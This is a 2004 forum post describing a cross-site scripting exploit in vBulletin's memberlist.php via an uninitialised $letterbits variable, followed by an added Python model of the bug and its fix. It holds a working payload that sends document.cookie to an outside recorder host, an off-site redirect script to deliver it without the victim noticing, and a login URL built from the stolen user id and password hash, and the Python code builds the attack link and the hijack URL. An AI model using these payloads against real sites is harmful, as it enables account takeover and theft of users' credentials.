spyshow
Posted September 26, 2004

Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

http://forums.xisto.com/no_longer_exists/http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E

(NOTE: The URL should be on one line)

you can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site HTML file:

<script>
location = "http://forums.xisto.com/no_longer_exists/%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>

and then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired: the above link will proceed first to the memberlist with the cookie-stealing code, and then to http://forums.xisto.com/no_longer_exists/.

With the recorded user id and password hash, we can access the site:

http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
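The chain the post describes, as an added example that is not part of the original post and not vBulletin's code. It is a Python model of the PHP behaviour at issue: with register_globals on, a variable the script never initialises (here $letterbits) is silently pre-filled from the query string, so a later `$letterbits .= '...'` appends the page's own markup to attacker-controlled text. Assumptions, all labelled in the code: the query parameter is named after the variable the post names (the real link was removed from the forum, so the host `forums.example` is hypothetical), the `<script>` wrapper around the recorder URL quoted in the post is constructed, the A-Z link bar is only a stand-in for what memberlist.php really builds, and the stolen cookie is a constructed sample.

```python
"""Model of the memberlist.php $letterbits bug (added example, not vBulletin code).

Shows (1) how register_globals hands the script attacker text in an
uninitialised variable, (2) the fix of initialising before use, and (3) what
the attacker does with the exfiltrated cookie.
"""
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Recorder URL quoted in the post; the <script> wrapper is constructed here.
RECORDER = "http://www.swgmotu.com/tests/record.php"
PAYLOAD = '<script>location="' + RECORDER + '?cook="+escape(document.cookie)</script>'

# Hypothetical forum host: the original link was removed from the post.
MEMBERLIST = "http://forums.example/memberlist.php"

# Constructed sample of escape(document.cookie) as record.php would receive it
# (bbpassword here is md5("password"), a throwaway value, not a real hash).
STOLEN_COOKIE = "bbuserid%3D42%3B%20bbpassword%3D5f4dcc3b5aa765d61d8327deb882cf99"


def attack_url(payload=PAYLOAD):
    """The link an attacker sends, or redirects to from an off-site page."""
    return MEMBERLIST + "?letterbits=" + quote(payload, safe="")


def register_globals(url):
    """Model of register_globals=On: every query parameter becomes a PHP global."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def letter_links():
    """Stand-in for the link bar memberlist.php builds with $letterbits .= ...
    (the real markup is assumed, only the append pattern matters here)."""
    return "".join('<a href="memberlist.php?ltr=%s">%s</a> ' % (c, c) for c in "ABC")


def render_vulnerable(url):
    """$letterbits is never set to '' first, so .= appends to the query value."""
    php_globals = register_globals(url)
    letterbits = php_globals.get("letterbits", "")  # what register_globals supplies
    letterbits += letter_links()                     # $letterbits .= '<a ...>'
    return '<div class="letters">' + letterbits + "</div>"


def render_fixed(url):
    """Fix: initialise before use, so request data never reaches $letterbits.
    (Turning register_globals off removes the whole class of bug; this is the
    per-script fix.)"""
    letterbits = ""                                  # $letterbits = '';
    letterbits += letter_links()
    return '<div class="letters">' + letterbits + "</div>"


def hijack_url(escaped_cookie):
    """Turn the exfiltrated cookie into the login URL shape from the post."""
    raw = unquote(escaped_cookie)                    # undo JavaScript escape()
    jar = dict(part.strip().split("=", 1) for part in raw.split(";") if "=" in part)
    return ("http://www.vbulletin.com/forum/index.php?bbuserid=%s&bbpassword=%s"
            % (jar["bbuserid"], jar["bbpassword"]))


if __name__ == "__main__":
    url = attack_url()
    print("attack link:", url)
    print("vulnerable output:", render_vulnerable(url))
    print("fixed output:     ", render_fixed(url))
    print("hijack URL:       ", hijack_url(STOLEN_COOKIE))
```

`render_vulnerable` emits the `<script>` tag verbatim at the start of the letter bar, which is exactly the position the post describes ("within the first few lines"); `render_fixed` produces the same bar with nothing from the request in it.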